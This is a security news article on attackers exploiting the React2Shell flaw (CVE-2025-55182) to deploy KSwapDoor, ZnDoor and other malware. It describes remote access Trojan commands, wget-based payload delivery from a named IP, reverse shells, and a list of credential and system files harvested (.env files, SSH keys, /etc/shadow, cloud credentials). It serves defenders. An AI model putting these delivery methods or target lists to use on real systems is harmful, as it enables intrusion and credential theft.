Bold warning: React2Shell is actively being weaponized to plant Linux backdoors, and the threat landscape around it is expanding fast.
The security flaw known as React2Shell is being weaponized by multiple adversaries to drop malware families such as KSwapDoor and ZnDoor. This conclusion comes from analyses by Palo Alto Networks Unit 42 and NTT Security, who describe a troubling trend of targeted exploitation and post-exploitation activity.
KSwapDoor is described by Justin Moore, senior threat intel researcher at Unit 42, as a professionally crafted remote access tool built for stealth. It forms an internal mesh network so compromised servers can communicate covertly, making blocks and detections more difficult. The malware uses strong encryption to conceal its communications and includes a “sleeper” mode that can be awakened by a secret, invisible signal to bypass firewalls.
Unit 42 notes that what was once misclassified as BPFDoor actually represents a Linux backdoor with interactive shell capabilities, command execution, file operations, and lateral movement scanning. It also masquerades as a legitimate Linux kernel swap daemon to avoid detection.
In a related thread, NTT Security reports that organizations in Japan are targeted by campaigns deploying ZnDoor via React2Shell. ZnDoor has been observed in the wild since at least December 2023 and is deployed by running a bash command to fetch the payload from a remote server (for example, 45.76.155.14) with wget, then executing it. Once installed, ZnDoor operates as a remote access Trojan capable of receiving and carrying out commands from actor-controlled infrastructure.
The list of available commands includes:
- shell: run a command
- interactiveshell: start an interactive session
- explorer: enumerate directories
- explorercat: display a file’s contents
- explorerdelete: remove a file
- explorerupload: download a file from the server
- explorerdownload: upload a file to the server
- system: collect system information
- changetimefile: modify a file’s timestamp
- socketquickstartstreams: launch a SOCKS5 proxy
- startinportforward: enable port forwarding
- stopin_port: disable port forwarding
This activity unfolds against the backdrop of CVE-2025-55182 (scoring a near-perfect 10.0 on CVSS), which has been exploited by several threat actors to execute arbitrary commands post-exploitation and to establish footholds across compromised networks. Notably, some operators set up reverse shells to known Cobalt Strike infrastructure and deployed remote monitoring tools like MeshAgent, while also manipulating authorized_keys and enabling root access where possible.
Payloads observed in these campaigns include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. Attackers frequently leverage Cloudflare Tunnels (notably endpoints like "*.trycloudflare.com") to evade defenses, while conducting environment reconnaissance to facilitate lateral movement and credential theft.
Credential harvesting is a key focus for several campaigns. Microsoft Defender notes that attackers target cloud endpoints—Azure IMDS, AWS, GCP, and Tencent Cloud—to harvest identity tokens and deepen access into cloud environments. They have also used secret discovery tools such as TruffleHog and Gitleaks, alongside custom scripts, to exfiltrate credentials including OpenAI API keys, Databricks tokens, and Kubernetes service-account credentials. Tools like Azure CLI (az) and Azure Developer CLI (azd) were employed to obtain tokens.
Additional analyses from Beelzebub describe campaigns exploiting Next.js vulnerabilities (including CVE-2025-29927 and CVE-2025-66478) to systematically harvest sensitive data, such as:
- Environment files (.env, .env.local, .env.production, .env.development)
- System environment variables (printenv, env)
- SSH keys (e.g., ~/.ssh/idrsa, ~/.ssh/ided25519, /root/.ssh/*)
- Cloud credentials (e.g., ~/.aws/credentials, ~/.docker/config.json)
- Git credentials (e.g., ~/.git-credentials, ~/.gitconfig)
- Command history (last 100 commands from ~/.bash_history)
- Critical system files (e.g., /etc/shadow, /etc/passwd)
Beyond credential theft, the malware establishes persistence to survive reboots, installs a SOCKS5 proxy, opens a reverse shell to a remote host, and deploys a React scanner to widen propagation. The operation, dubbed Operation PCPcat, is believed to have compromised tens of thousands of servers, underscoring its scale and potential impact on industrial data ecosystems.
Shadowserver Foundation currently tracks more than 111,000 IP addresses vulnerable to React2Shell attacks, with roughly 78,000+ instances in the United States and notable activity across Germany, France, and India. GreyNoise data over the past day shows hundreds of malicious IPs across the U.S., India, the U.K., Singapore, and the Netherlands actively participating in exploitation.
If you’d like to read deeper on this topic, you can follow The Hacker News on Google News, X (Twitter), or LinkedIn for ongoing coverage and updates.
